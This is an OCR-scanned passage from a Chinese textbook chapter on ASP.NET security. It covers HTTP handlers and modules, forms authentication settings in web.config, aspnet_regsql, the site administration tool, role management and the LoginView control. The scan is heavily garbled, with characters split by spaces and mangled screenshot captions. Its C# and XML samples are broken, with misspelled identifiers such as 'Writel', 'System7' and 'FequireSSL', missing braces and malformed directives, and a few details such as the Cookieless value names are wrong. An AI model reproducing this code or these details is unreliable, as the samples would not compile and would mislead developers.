虚拟 目录 的 web.config 文件 中 添加 <httpHandlers> 标 签 完成 ， 配 置 如 下 : 


<configuration> 
<system.web> 
<httpHandlers> 
<add verb="GET" path="*.time" 
type="Pipeline.TimeHandler, 
Pipeline" 
/> 
</httpHandlers> 
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</system.web> 
</configuration> 


以 上 代码 可 以 作为 附加 的 信息 添加 到 .config 的 配置 文件 ，web.config 文件 会 告诉 
ASP.NET 的 HTTP 管道 程序 处 理 所 有 .time 文件 的 GET 请 求 。 

这 些 .time 文件 的 request 请 求 会 被 IS 转发 到 aspnet_isapi.dll， 以 便 第 一 时 间 被 管道 程 
序 处 理 ， 同 时 这 些 request 请 求 也 会 在 IS 的 metabase 中 添加 一 个 新 的 文件 映射 。 

一 些 高 级 的 ASP.NET 技术 ， 如 pages 和 Web Services 都 是 通过 顶层 HTTP handler 直 
接 创 建 的 , 以 下 的 代码 演示 的 是 通过 .config 文件 配置 httpHandlers, 用 来 根据 不 同文 件 后 级 
执行 不 同 的 处 理 程序 : 

<httpHandlers> entries: 

<httpHandlers> 


<add verb="*" path="*.ashx" 

type="System.Web.UI.SimpleHandlerFactory" 

/> 

<add verb="*" path="*.aspx" 
type="System.Web.UI.PageHandlerFactory" 
/> 


<add verb="*" path="*.asmx" 
type="System.Web.Services.Protocols. 
WebServiceHandlerFactory ... " 
Wi 

</httpHandlers> 

第 一 个 实体 将 扩展 名 为 .ashx 的 文件 映射 到 SimpleHandlerFactory 类 ,使 得 HTTP handler 
factory 知道 如 何 从 .ashx 源 文件 中 安装 、 编 译 和 执行 一 个 IHttpHandler， 其 结果 对 象 可 以 被 
HTTP 管道 程序 直接 使 用 。 

第 二 个 实体 将 .aspx 文件 扩展 名 映射 到 PageHandlerFactory 类 ,让 HTTP handler factory 
知道 如 何 将 .aspx 的 源 代码 编译 成 一 个 System.Web.UI.Page-derived 类 。 这 个 Page 类 实现 了 
IHttpHandler 接口 ， 其 结果 对 象 可 以 被 HTTP 管道 程序 直接 使 用 。 

第 三 个 实体 将 .asmx 的 扩展 名 映射 到 WebServiceHandlerFactory 类 , 这 么 做 主要 为 了 让 

-个 HTTP handler factory 知道 如 何 将 一 个 .asmx 文件 中 的 源 代码 编译 并 实例 化 。 然 后 它 会 
绑 定 一 个 标准 的 HTTP handler (默认 的 为 SyncSessionlessHandler) 实例 并 使 用 反射 机 制 将 
SOAP 信息 转化 成 方法 的 调用 参数 。 最 后 ,结果 对 象 就 可 以 被 HTTP 管道 程序 直接 使 用 了 。 

为 了 进一步 说 明 管道 技术 如 何 安 全 处 理 用 户 的 请 求 , 范例 代码 将 演示 如 何 使 用 .ashx 文 
件 重 写 TimeHandler。 它 能 够 在 用 户 申请 访问 .ashx 文件 的 同时 被 系统 执行 并 显示 当前 时 间 。 
同 理 ， 也 可 以 编写 需要 的 安全 防范 代码 来 进行 替代 。 

<%@ WebHandler language="C#" 

class="Pipeline.TimeHandler" $> 

using System; 

using System.Web; 

namespace Pipeline 


public class TimeHandler : IHttpHandler 





{ 
void ProcessRequest (HttpContext ctx) 
{ 
// 设置 映射 类 型 
ctx.Response.ContentType = "text/xml"; 
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// 显示 信息 

ctx.Response.Write ("<now>"); 

ctx.Response.Writel( 
DateTime.Now.ToString()); 

ctx.Response.Write ("</now>"); 


} 
bool IsReuseable { get { return true; } } 


全 注 意 : PageHandlerFactory、WebServiceHandlerFactory 和 SimpleHandlerFactory 类 并 不 
能 在 每 一 个 请 求 中 都 编译 一 次 .aspx、.asmx 和 .ashx 文件 。 这 些 编译 好 的 代码 会 被 
缓存 在 ASPNET 安装 目录 下 的 临时 文件 中 ,并且 当 源 代码 改变 时 才 会 再 次 被 编译 。 


HTTP 模块 是 一 种 过 滤器 ,在 request 和 response 信息 穿 过 管道 程序 时 检查 并 修改 信息 
内 容 。 管 道 程 序 可 以 用 这 些 HTTP 模块 安全 地 实现 底层 处 理 程序 。 
HTTP 模块 是 实现 IHttpModule 接口 的 简单 类 ， 其 定义 代码 如 下 : 


interface IHttpModule 


. 

// 调 出 附加 事件 

void Init(HttpApplication app); 
// 初始 化 

void Dispose()// 释放 

} 

当 module 被 首次 创建 时 ， 初 始 化 方法 Init 被 HttpApplication 对 象 调用 ， 它 通过 
HttpApplication 对 象 将 一 个 或 多 个 handlers 绑 定 到 事件 上 。 

下 面 的 示例 代码 展示 HITP module 如 何 处 理 HttpApplication 对 象 的 BeginRequest 事件 
和 EndRequest 事件 。 在 这 个 例子 中 ，Init 方法 使 用 .NET 技术 将 module 的 OnBeginRequst 
和 OnEndRequest 作为 事件 句柄 绑 定 到 HttpApplication 对 象 上 。 

OnBeginRequest 的 主要 作用 是 获取 存储 当前 时 间 并 将 时 间 存 放 到 变量 start 中 。 而 
OnEndRequest 的 主要 作用 是 计算 OnBeginRequest 和 OnEndRequest 之 间 的 运行 时 间 差 并 将 
这 段 时 间 添 加 到 客户 端 HITP header 中 。 

OnEndRequest 方法 的 最 大 优势 在 于 第 一 个 参数 实际 上 传递 的 module 绑 定 的 
HttpApplication 对 象 。 当 前 的 信息 作为 一 个 HttpApplication 对 象 的 属性 〈Http-Context) 被 
OnEndRequest 方法 使 用 。 

实例 代码 如 下 : 

using System7 

using System.Web; 

namespace Pipeline 


public class ElapsedTimeModule : IHttpModule 
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DateTime start; 
public void Init(HttpApplication app) 
{ 
// register for pipeline events 
app-BeginRequest += 
new EventHandler (this.OnBeginRequest); 
app.EndRequest += 
new EventHandler (this.OnEndRequest); 
} 
// 释放 
public void Dispose() {} 
public void OnBeginRequest (object o, 
EventArgs args) 
{ 
// 当 用 户 请 求 则 记录 时 间 
start = DateTime.Now; 
} 
// 请 求 完 毕 
public void OnEndRequest (object o， 
EventArgs args) 


// 检测 释放 时 间 
TimeSpan elapsed = 
DateTime.Now - start; 
// 获取 程序 上 下 文 
HttpApplication app = 
(HttpApplication) o; 
HttpContext ctx = app.Context; 
// 添加 自 定义 输出 头 
ctx.Response.AppendHeader ( 
"ElapsedTime" 
elapsed.ToString()); 


} 
) 


在 使 用 一 个 HTTP module 类 之 前 必须 对 它 做 一 定 的 配置 ， 包 括 两 步 : 首先 ， 将 编译 好 
的 module 代码 放 到 Web 服务 器 上 的 站 点 目录 下 的 bin 文件 夹 , 这 样 ASP.NET 的 工作 进程 
才能 够 找到 它 ， 然 后 ， 开 发 人 员 在 web.config 文件 中 添加 <httpModules> 部 分 ， 示 例 代码 
如 下 : 


<configuration> 

<system.web> 

<httpModules> 
<add 
name="Elapsed" 
type="Pipeline.ElapsedTimeModule, Pipeline™ 
2 

</httpModules> 

</system.web> 

</configuration> 


. 147 . 





无 懈 可 击 一 一 全 方位 构建 安全 Web 系统 


这 个 例子 中 ,web.config 文件 告诉 ASP.NET 的 HTTP 管道 程序 , 让 Pipeline ElapsedTime 
Module 绑 定 到 每 一 个 HttpApplication 对 象 ， 处 理 这 个 虚拟 目录 下 的 用 户 请 求 。 


8.2 角色 安全 认证 





用 户 认 证 (authentication ) 和 授权 (authorization ) 在 许多 Web 站 点 和 浏览 器 的 应 用 程 
序 中 都 非常 重要 。 在 传统 的 Web 应 用 程序 中 ， 主 要 使 用 Form (表单 ) 的 方式 进行 用 户 和 
其 角色 的 管理 。 使 用 表单 认证 的 时 候 ， 可 以 将 未 经 认证 的 用 户 重 定向 到 一 个 包含 表格 的 页 
面 ， 让 用 户 填 写 必要 的 信息 之 后 提交 。 

用 户 经 过 应 用 程序 的 认证 以 后 ， 浏 览 器 将 会 收 到 一 个 HTTP 的 Cookie， 该 Cookie 表 
示 用 户 已 经 被 认证 ， 之 后 用 户 就 不 用 再 输入 认证 信息 进行 认证 了 。 这 种 久 经 考验 的 认证 方 
式 至 今 仍然 非常 有 效 ， 而 它 的 缺点 就 是 需要 开发 人 员 编 写 所 有 的 验证 代码 。 在 大 多 数 情 况 
下 ， 编 写 这 些 代码 是 比较 耗 时 的 。 

ASP.NET 3.0 以 上 版 本 在 提供 新 用 户 、 角 色 管理 功能 的 同时 ， 提 供 了 新 的 认证 和 授权 
机 制 来 管理 Web 站 点 的 用 户 和 和 角色。 新 的 认证 和 授权 机 制 是 一 种 非常 简单 易 用 的 框架 , 后 
台 使 用 SQL Server 进行 数据 的 存储 。ASP.NET 也 提供 了 许多 API 供 开 发 者 调用 ， 实 现 以 
程序 代码 的 方式 访问 成 员 和 角色 管理 系统 。 

在 开始 进入 ASP.NET 的 成 员 或 角色 管理 的 内 容 之 前 ， 先 了 解 IS 和 ASP.NET 安全 处 
理 流程 、 用 户 认证 和 角色 管理 的 知识 。 





8.2.1 IIS 和 ASP.NET 用 户 认证 流程 


客户 端 传 来 的 页 面 请 求 在 到 达 ASPNET 引擎 之 前 , 由 IIS 服务 器 负责 验证 基本 安全 属 
性 。 通 过 IS 的 验证 以 后 ，ASP.NET 应 用 程序 启动 ， 页 面 请 求 被 转发 到 ASP.NET 应 用 程 
序 。ASP.NET 应 用 程序 根据 系统 设置 和 配置 文件 ， 验 证 发 送 请 求 的 用 户 的 身份 是 否 合法 。 
如 果 用 户 身份 是 合法 的 ， ASP.NET 应 用 程序 会 检查 应 用 程序 是 否 启用 了 角色 系统 ， 如 
果 角 色 系 统 启用 ， 则 映射 相应 的 用 户 角 色 。 如 图 8-4 所 示 ， 页 面 请 求 在 IS 和 ASP.NET 中 
按照 固定 的 流程 进行 处 理 。 











8.2.2 ASP.NET 用 户 认 证 


ASPNET 提供 了 成 员 管 理 服务 来 处 理 页 面 或 站 点 的 用 户 认证 过 程 。ASP.NET 中 不 仅 
增加 了 一 些 新 的 与 用 户 认证 相关 的 类 库 和 方法 ， 而 且 还 增加 了 一 些 新 的 服务 器 控件 ， 方 便 
开发 人 员工 作 。 

在 使 用 安全 相关 的 控件 之 前 ,必须 对 现 有 的 Web 站 点 进行 一 些 设置 , 使 站 点 能 和 新 的 
认证 服务 功能 共同 工作 。 默 认 情况 下 ，ASP.NET 使 用 内 置 的 AspNetSqlProvider 来 储存 应 
用 程序 中 的 注册 用 户 。 
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图 8-4 IIS/ASPNET 请 求 处 理 流 程 
ASP.NET 中 用 户 认证 服务 的 体系 结构 如 图 8-5 所 示 。 


服务 器 控件 一 Membership 服 务 器 控件 











Membership 提 供 者 程序 集 


成 员 数据 存储 


Ce CT 








图 8-5 用 户 认 证 功能 结构 
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在 使 用 ASP.NET 的 认证 服务 之 前 ， 需 要 检查 是 否 已 经 在 把 ASP.NET 的 服务 信息 注册 
到 对 应 的 SQL Server 中 ， 检 查 对 应 的 SQL Server 服务 器 中 有 没有 aspnetdb 数据 库 。 如 果 
数据 库 中 缺少 aspnetdb 数据 库 ， 那 么 需要 运行 aspnet regsqlLexe 工具 完成 注册 工作 。 
aspnet regsql.exe 工具 在 Windows 目录 下 的 Microsoft.NET\Framework\v4.0.30319 中 。 使 用 
时 , 在 所 在 文件 夹 双 击 或 以 命令 行 方式 启动 , 并 使 用 /W 参数 启动 配置 向 导 , 如 图 8-6 所 示 。 














「 寅 ASP.NET SQL Server Setup Wizard Ea lh 


位 Welcone to the ASP. HET SQL Server Setup Vizard 
L 


This wizard creates or configures a SQL Server database that stores information for 
ASP. NET applications services (nembership, profiles, role managenent, personalization 
and SQL Web event provider). 





To configure the database for these features individually or for additional features 
Such as session state or SQL cache dependency, run aspnet_regsql at the command line. 
For help with conmand line options, use the “-?” switch- 


Click Next to continue. 











图 8-6 aspnet regsqlLexe 注册 向 导 


以 用 命令 行 或 双击 的 方式 启动 aspnet_regsql 管理 程序 ， 按 照 默认 的 选项 对 管理 程序 
; ae 8-7 所 示 的 步 台 中 填 入 对 应 的 S es Server 服务 器 名 字 和 对 应 的 登录 








ASP.NET [x | 


丛 Select the Server and Database 
L 


Specify the SQL Server hane，database name to create or renove, and the credentials to 
se when connecting to the database. 





i The credentials must identify a user account that has permissions to 
create or remove a database. 








Server: 
(© indows authentication 
SQL Server authentication 
User name: 
Password: 


Database: 《defanlt> 二 


Z renins Bins Eonsal 











图 8-7 aspnet_regsql 数据 库 服 务 器 选择 
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完成 ASPNET 应 用 程序 在 SQL Server 的 注册 以 后 ， 就 可 以 开始 配置 应 用 程序 ， 启 用 
新 的 成 员 认 证 服务 了 。 首先 , 使 用 成 员 管 理 功 能 的 表单 (Form) 认证 , 在 站 点 的 web.config 
文件 中 增加 下 面 的 代码 : 


<configuration> 
<system.web> 
<authentication mode="Forms"/> 
</system.web> 
</configuration> 
在 web.config 配置 文件 中 增加 <authentication> 配 置 元 素 后 就 可 以 开启 新 成 员 管 理 服 
务 ， 然 后 再 为 mode 属性 指定 Forms， 启 用 表单 认证 。 这 里 除了 可 以 使 用 Forms 值 以 外 ， 
还 可 以 使 用 Windows、Passport 和 None 值 。 
上 面 的 代码 仅仅 是 为 Web 应 用 程序 指明 了 使 用 Forms 的 认证 方式 , 但 是 具体 如 何 认证 
仍然 需要 用 户 提供 更 加 明确 的 信息 。 一 种 常见 的 情景 是 ，Web 站 点 允许 匿名 访问 的 用 户 对 
页 面 进行 访问 ， 不 过 当 ASP.NET 应 用 程序 检查 到 用 户 是 匿名 访问 的 时 候 ， 就 会 自动 将 用 
户 导向 一 个 登录 页 面 。 当 用 户 提 供 登录 信息 以 后 ， 服 务 器 如 果 认证 了 用 户 的 身份 合法 ， 就 
回 传 给 用 户 一 个 Cookie， 表 示 用 户 已 经 通过 了 认证 。 为 了 实现 这 个 典型 的 情景 ， 需 要 改动 
上 面 的 <authentication> 配 置 节点 ， 配 置 代码 如 下 所 示 : 


<configuration> 
<system.web> 
<authentication mode="Forms"> 
<forms name=".ASPXAUTH" 
loginUrl="Userlogin.aspx" 
protection="All" 
timeout="90" 
path="/" 
FequireSSL="false" 
slidingExpiration="true" 
Cookieless="useDeviceProfile"/> 
</authentication> 
</system.web> 
</configuration> 


下 面 解释 <Forms> 配 置 元 素 中 各 个 属性 的 含义 : 

口 name: 这 个 属性 值 指定 在 用 户 通过 验证 以 后 ， 将 要 发 送 给 用 户 浏览 器 的 Cookie 的 
名 称 。 如 果 不 指定 name 属性 值 , ASPNET 会 自动 应 用 默认 名 称 “.ASPXAUTH”。 

口 loginURL: 这 个 属性 值 指定 了 默认 的 登录 页 面 ， 任 何 未 经 过 验证 的 用 户 都 将 被 自 
动 导向 该 页 面 。 在 上 面 的 代码 中 ， 属 性 指定 了 UserLogin.aspx 为 登录 页 面 。 

口 protection: 这 个 属性 值 说 明了 ASPNET 对 Cookie 内 容 的 保护 级 别 。 可 以 使 用 的 
值 有 All、None、Validation 和 Encription。 一 般 推荐 使 用 All， 它 实现 了 对 Cookie 
提供 最 高 级 别 的 保护 。 

口 path: path 值 指明 发 送 给 用 户 浏 览 器 Cookie 的 应 用 程序 的 路 径 。 

口 timeout: timeout 的 值 规定 了 Cookie 值 的 过 期 时 间 ， 单 位 是 分 钟 。 如 果 timeout 的 
值 为 30， 那 么 在 服务 器 端 发 出 Cookie 以 后 的 30 分 钟 内 ， 客 户 端的 Cookie 的 内 容 
有 效 ; 超出 timeout 规定 的 时 间 以 后 ，Cookie 内 容 失 效 ，ASPNET 应 用 程序 不 再 
承认 Cookie 有 效 性 ， 需 要 重新 认证 。 



































i 
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口 requireSSL: 这 个 属性 指定 了 是 和 否 明 文 发 送 用 户 的 密码 ， 如 果 值 为 false， 那 么 就 明 
文 发 送 ;否则 通过 SSL 加 密 传输 。 

口 slidingExpiration: 这 个 属性 比较 重要 ， 它 规定 了 Cookie 过 期 时 间 的 计算 方式 。 如 
果 为 true, 那么 Cookie 的 过 期 时 间 由 最 后 一 次 访问 该 ASP.NET 应 用 程序 开始 计算 ， 
如 果 为 false， 那 么 过 期 时 间 由 第 一 次 访问 ASP.NET 应 用 程序 时 开始 计算 。 

口 Cookieless: 这 个 属性 是 ASPNET 新 增加 的 属性 。 这 个 属性 值 决定 ASP.NET 应 用 
程序 如 何 使 用 以 及 是 否 使 用 Cookie。Cookieless 属性 的 值 可 能 为 UseCookies、 
UseProfileDevice、AutoDetect 和 UseUri。 如 果 值 为 UseCookies， 那 么 ASPNET 应 
用 程序 就 会 使 用 Cookie 进行 验证 ; 如 果 为 UseUri， 那 么 Cookie 不 会 被 使 用 ; 
UseDeviceProfile 表明 根据 客户 端 浏览 器 的 设置 来 决定 是 否 使 用 Cookie。 

如 果 发 现 客户 端 浏 览 器 不 支持 Cookie， 那 么 ASP.NET 应 用 程序 就 不 使 用 Cookie。 在 
代码 中 判断 客户 端的 浏览 器 是 否 支持 Cookie， 需 要 验证 RequestBrowser.Cookies 和 
Request.Browser.SupportsRedirectWithCookie 的 值 是 否 都 为 tue。 最 后 ， 如 果 Cookieless 的 
值 为 AutoDetect， 那 么 自动 检测 浏览 器 是 否 支持 Cookie。 

有 两 种 方法 可 以 为 ASP.NET 的 站 点 添加 新 的 用 户 ， 它 们 是 使 用 ASP.NET 管理 工具 添 
加 用 户 和 使 用 Membership/Role API 直接 添加 用 户 ， 下 面 分 别 进行 介绍 。 


8.2.3 使 用 ASP.NET 管理 工具 添加 用 户 


在 web.config 文件 中 设置 适当 的 配置 内 容 以 后 ， 就 可 以 为 Web 站 点 配置 添加 用 户 了 。 
ASP.NET 内 置 了 一 个 站 点 管理 工具 ， 可 以 通过 该 工具 实现 用 户 的 添加 。 下 面 演示 如 何 
使 用 这 个 工具 。 首 先 ， 如 图 8-8 所 示 ， 在 菜单 中 启动 管理 工具 。 
DetailsViewDemo (2) - Microsoft Visual Studio 

文件 加 ”编辑 目 ”视图 凡 Vassistx | 网 站 (5) 上 生成 多 调试 @) 工具 四 ”窗口 WW) 社区 (QO) 才 助 吊 
; 闻 - 辕 各 |% 各 遍 | 则 v 训 | 到 添加 新 项 WW)..。 col+ShifttA 

添加 现 有 项 (@)..。 Shift+Alt+A 

罗 | 复制 网 站 四 … 

从 项 目 中 排除 加 
害 | 呈 示 所 有 文件 (0 








媒 套 相关 文件 四 
Visio UML 








添加 引用 (R)..… 
添加 Web 引用 但 ).… 
设 为 起 始 页 (p) 
启动 选项 (D)… 


图 8-8 ASPNET 配置 管理 菜单 项 








ASP.NET 配置 管理 工具 是 一 个 内 置 的 Web 管理 器 ， 启 动 以 后 会 进入 如 图 8-9 所 示 的 
界面 ， 在 界面 上 单 击 “安全 ”链接 。 
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AS P 网 站 管理 工具 





如 何 使 用 此 工具 (加 





应 用 程序 :/DetailsViewDemo 
当前 用 户 名 :JEMMY\JEMMY WANG 


安全 使 您 能 够 设置 和 编辑 用 户 、 人 
站 点 正在 使 用 windows 身份 验证 进行 用 户 管 


应 用 程序 配置 使 您 能 够 管理 应 用 程序 的 配置 设置 。 
提供 程序 配置 使 您 能 够 指定 存储 网 站 所 用 的 管理 数据 的 位 置 和 方式 。 








图 8-9 Web 站 点 管理 器 





单 击 进入 安全 管理 以 后 ， 就 可 以 开始 创 应 用 程序 的 用 户 了 。 在 图 8-10 所 
示 的 界面 中 单 击 “ 创 建 用 户 ” 链 接 ， 进 入 用 户 添 加 页 面 ， 如 图 8-11 所 示 。 
罚 ASP. Het Web 应 用 程序 管理 - 了 icrosoft Internet Explorer 


文件 中 编辑 下 ) 查看 QW) 收藏 ) 工具 CD) 帮助 0D 


地 址 加 ) | 下 http://1ocalhost:1041/asp. netwebadninfiles/security/security, aspx 


如 何 使 用 此 工具 ? (3) 





可 以 使 用 网 站 管理 工具 来 管理 应 用 程序 的 所 有 安全 设置 。 可 以 设置 用 户 和 窗 码 (身份 验证 )， 可 以 创建 角 
色 ( 用 户 组 )， 还 可 以 创建 权限 (用 于 控制 对 应 用 程序 各 个 部 分 的 访问 的 规则 )。 


默认 情况 下 ， 用 户 信息 存储 Microsoft SQL Server Express 数据 库 中 ， 访 数据库 在 网 站 的 Data 文 
件 夹 中 。 如 果 要 将 用 户 信息 存储 在 其 他 数据 库 中 ， 请 使 用 “提供 程序 ”选项 卡 选择 其 人 


单 击 表 中 的 链接 以 管理 应 用 程序 的 设置 。 
CE CE 
现 有 用 户 : 2 未 启用 角色 

启用 角色 通关 是 





全 本 地 Intranet 
图 8-10 ”安全 配置 界面 


在 图 8-11 中 的 用 户 添加 页 面 加 入 用 户 名 、 密 码 、 邮件 地 址 以 及 安全 问答 以 后 , 单 击 “ 创 
建 用 户 ” 按 钮 就 可 以 将 用 户 添 加 到 数据 库 中 。 添 加 成 功 以 后 ， 页 面 上 会 显示 “已 成 功 创建 
您 的 账户 ”字样 。 

使 用 内 置 的 ASP.NET 管理 器 可 以 非常 方便 地 添加 用 户 。 那 么 ， 如 果 在 添加 用 户 的 时 
候 希 望 能 够 输入 更 多 的 信息 ， 应 该 怎么 办 呢 ? 例如 ， 开 发 人 员 希 望 能 够 保存 用 户 的 年 龄 、 
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和 
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姓名 以 及 电话 等 信息 ， 这 时 ， 内 置 的 管理 工具 就 不 能 再 满足 要 求 ， 而 ASP.NET 内 置 的 一 
些 与 用 户 管理 相关 的 控件 就 派 上 用 场 了 。 











图 8-11 用 户 添加 页 面 


8.2.4 角色 管理 系统 


许多 Web 应 用 程序 不 仅仅 对 用 户 进行 认证 , 还 为 不 同 级 别 的 用 户 提供 不 同 功能 。 为 了 
实现 为 不 同 用 户 提 供 不 同 功 能 或 服务 的 特性 ， 就 要 求 应 用 程序 能 区 分 用 户 角色 。 在 
ASP.NET 2.0 之 前 ， 要 实现 区 分 角色 这 个 特性 ， 需 要 编写 大 量 的 代码 ， 而 ASP.NET 直接 提 
供 了 这 个 功能 , 开发 者 只 需要 做 少量 的 工作 就 可 以 使 Web 应 用 程序 支持 用 户 按 角 色 进 行 区 
分 ， 从 而 提供 不 同 的 服务 。 


1. 角色 管理 


网 站 的 角色 管理 可 以 帮助 开发 人 员 管理 用 户 授 权 ， 通 过 授权 可 以 为 通过 认证 的 用 户 指 
定 一 些 可 以 访问 的 资源 。 角 色 管 理 可 以 把 用 户 分 组 ， 然 后 以 组 为 单位 进行 管理 。 一 般 把 用 
户 分 为 管理 员 、 一 般 用 户 、 高 级 用 户 和 游客 等 。 

为 应 用 程序 建立 角色 以 后 ， 就 可 以 规定 每 个 角色 的 访问 控制 权限 。 例 如 ， 如 果 一 个 应 
用 程序 中 有 一 些 页 面 ， 希 望 只 对 具有 管理 员 角 色 的 用 户 开放 ， 也 就 是 说 ， 只 有 管理 员 角 色 
才 有 访问 这 些 页 面 的 权限 。 类 似 的 ， 可 以 为 每 个 页 面 规定 访问 需要 的 角色 。 有 了 和 角色 的 概 
念 ， 就 不 必 为 每 个 用 户 单独 赋予 权 限 了 。 

用 户 可 以 同时 拥有 多 个 不 同 的 角色 。 不 同 的 角色 可 以 有 不 同 的 优先 级 ， 如 果 用 户 拥 有 
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两 个 或 者 两 个 以 上 的 角色 ， 系 统 只 针对 优先 级 较 高 的 角色 的 规则 发 生 作 用 。 
2. 角色 管理 和 成 员 管理 的 关系 


从 上 面 对 角 色 管 理 的 描述 可 以 看 出 ， 为 应 用 程序 定义 角色 之 前 ， 必 须 存在 使 用 该 程序 
的 成 员 。 也 就 是 说 ， 先 有 成 员 管理 ， 然 后 才 是 针对 该 成 员 的 角色 分 配 ， 必 须 有 可 以 通过 验 
证 的 用 户 ， 然 后 才能 通过 角色 来 控制 用 户 的 访问 行为 。 一 般 来 说 ， 开 发 人 员 可 以 通过 
Windows 认证 和 表单 (Form) 认证 验证 用 户 的 身份 。 

3. 应 用 角色 管理 


下 面 举例 说 明 如 何 使 用 ASP.NET 的 角色 管理 系统 。 打开 VS 2010 的 IDE, 在 菜单 File 
中 ,选择 新 建 一 个 Web 站 点 : RoleDemoSite。 站 点 项 目 建立 完毕 以 后 , 在 Solution Explorer 
中 , 右 击 项 目 节点 , 添加 一 个 新 的 目录 ,AdminPages; 然后 在 这 个 目录 中 添加 Admin1.aspx 
页 面 。 在 根 目录 下 再 添加 一 个 login.aspx 页 面 ， 在 页 面 上 放置 一 个 Login 控件 。 

有 了 可 供 演示 的 例子 之 后 , 就 可 以 开始 配置 用 户 以 及 对 应 的 角色 了 。 从 VS 2010 的 “网 
站 ”菜单 中 ， 选 择 “ASP.NET 配置 ”选项 进入 ASPNET 配置 页 面 。 在 ASP.NET 站 点 配置 





访问 规则 





图 8-12 ”安全 配置 页 面 


在 安全 配置 页 面 中 ， 单 击 “ 启 用 角色 ”来 启用 角色 管理 系统 。 然 后 在 同一 页 面 上 单 击 
“创建 或 管理 角色 ”来 添加 新 的 角色 。 本 例 在 角色 添加 页 面 中 添加 3 个 角色 , 分 别 是 Admin、 
User 和 Guest。 添 加 完成 后 ， 就 可 以 在 如 图 8-13 所 示 的 页 面 中 看 见 被 添加 的 角色 。 

添加 角色 的 过 程 其 实 非常 简单 , 只 需要 输入 角色 的 名 称 就 可 以 了 。 接着 就 来 添加 用 户 ， 
并 为 用 户 指定 相应 的 角色 。 如 果 安 全 管理 页 面 上 ，Users 部 分 显示 如 图 8-13 所 示 ， 那 么 单 
击 安全 配置 页 Security.aspx 的 “选择 身份 验证 类 型 ”的 链接 ， 将 认证 方式 改 为 mtemet。 回 
到 安全 管理 页 面 , 在 “用 户 ”部 分 , 单 击 “ 创 建 用 户 ” 链 接 开 始 创建 新 的 用 户 。 在 如 图 8-14 
所 示 的 图 中 ， 在 左边 输入 用 户 的 相应 信息 ， 在 右 侧 选 择 适合 的 角色 。 


人 和 
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创建 新 角色 





为 此 用 户 选择 角色 : 


C Admi 
FF Guest 
Fuser 





8-14 为 新 建 用 户 指定 角色 


现在 添加 一 个 用 户 名 为 WebAdmin 的 用 户 ， 密 码 可 以 根据 规则 进行 指定 ， 然 后 为 这 个 
用 户 指定 Admin 的 角色 ; 接着 添加 一 个 名 为 TestUser 的 用 户 ， 角 色 为 User。 添 加 完 用 户 


以 后 ， 用 户 就 有 了 角色 的 属性 。 接 下 来 为 相应 的 角色 指定 访问 规则 。 选 中 “角色 ” 复 选 框 
后 ， 系 统 将 显示 如 图 8-15 所 示 的 界面 。 





8-15 创建 角色 访问 规则 


人 
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现在 为 根 目录 指定 允许 拥有 User 角色 的 用 户 进行 访问 ， 为 AdminPages 目录 指定 允许 
Admin 角色 的 用 户 访问 ， 同 时 选择 拒绝 User 用 户 的 访问 。 通 过 以 上 配置 ， 就 实现 了 根据 用 
户 角色 提供 不 同 访问 权限 的 功能 ,读者 可 以 测试 一 下 这 个 站 点 ,如 首先 访问 站 点 default.aspx 
页 面 ， 页 面 会 自动 跳 转 到 Login.aspx 页 面 进行 登录 。 

如 果 使 用 的 是 User 或 Admin 级 别 的 用 户 ， 而 且 登 录 通 过 了 验证 ， 那 么 就 可 以 浏览 到 
default.aspx 页 面 ; 如 果 用 户 使 用 Admin 级 别 的 用 户 进 行 了 登录 ， 那 么 用 户 除 了 可 以 访问 
default.aspx 页 面 ， 还 可 以 访问 AdminPages 目录 下 的 Admin1.aspx 页 面 。 





























4. 修改 <RoleManager> 节 点 


和 控制 用 户 验证 的 节点 <Authentication> 相 似 ， 开 发 人 员 可 以 修改 machine.config 配置 
文件 中 的 <RoleManager> 配 置 节 ， 也 可 以 在 web.config 文件 中 进行 修改 。 
下 面 的 XML 代码 示例 了 RoleManager 配置 节 的 所 有 可 配置 属性 。 


<roleManager 
enabled="false" 
cacheRolesInCookie="false" 
CookieName=" .ASPXROLES" 
CookieTimeout="30" 
CookiePath="/" 
CookieRequireSSL="false" 
CookieSslidingExpiration="true" 
CookieProtection="All" 
defaultProvider="AspNetSqlRoleProvider" 
createPersistentCookie="false" 
maxCachedResults="25"> 
<providers> 
<clear /> 
<add connectionSstringName="LocalSqlServer" applicationName="/" 
name="AspNetSqlRoleProvider" type="System.Web.Security. 
SqlRoleProvider, 
System.Web, Version=2.0.0.0, Culture=neutral, 
PublicKeyToken=b03f5f7flld50a3a" /> 
<add applicationName="/" name="AspNetWindowsTokenRoleProvider" 
type="System.Web.Security.WindowsTokenRoleProvider, 
System.Web, 
Version=2.0.0.0, Culture=neutral, PublicKeyToken= 
b03f5f7f11d50a3a" /> 
</providers> 
</roleManager> 


对 RoleManager 的 配置 部 分 进行 说 明 :Enabled 属性 值 决 定 了 是 否 在 应 用 程序 中 启用 角 
色 这 个 特性 ，cacheRolesInCookie 属性 指定 了 是 否 把 用 户 的 角色 信息 存放 到 Cookie 中 ， 如 
果 不 放 到 缓存 中 ，ASP.NET 应 用 程序 会 在 每 次 需要 获取 用 户 角色 信息 的 时 候 访问 数据 库 ; 
CookieName 属性 则 简单 地 规定 了 缓存 的 角色 信息 在 Cookie 中 的 名 字 。 

5. 使 用 用 户 角 色 控 件 


除了 对 目录 设置 权限 以 外 ， 还 可 以 使 用 用 户 角色 相关 控件 在 单独 的 页 面 中 根据 不 同 的 
角色 提供 不 同 的 显示 和 功能 。 使 用 LoginView 控件 可 以 非常 容易 地 实现 这 个 功能 。 新 建 
Web 站 点 RoleApplication， 在 Default.aspx 中 加 入 一 个 LoginView 控件 ， 代 码 如 下 所 示 : 

<%@ Page Language="C#" AutogventWireup="true" CodeFile="Default.aspx.cs" 


Inherits=" Default" 和 > 


A 
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<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www. 
Ww3.0rg/TR/xhtml1/DTD/xhtmll-transitional .dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml" > 
<head runat="server"> 
<title>Untitled Page</title> 
</head> 
<body> 
<form id="forml" runat="server"> 
<div> 
<asp:LoginView ID="LoginViewl" runat="server"> 
<LoggedInTemplate> 
这 个 部 分 只 有 通过 验证 的 用 户 才能 看 见 
</LoggedIinTemplate> 
<AnonymousTemplate> 
<asp:Login ID="Loginl" runat="server"> 
</asp:Login> 
</AnonymousTemplate> 
</asp:LoginView> 
</div> 
</form> 
</body> 
</html> 


LoginView 控件 包含 两 个 模板 ，LoggedInTemplate 和 AnonymousTemplate， 为 已 经 登 
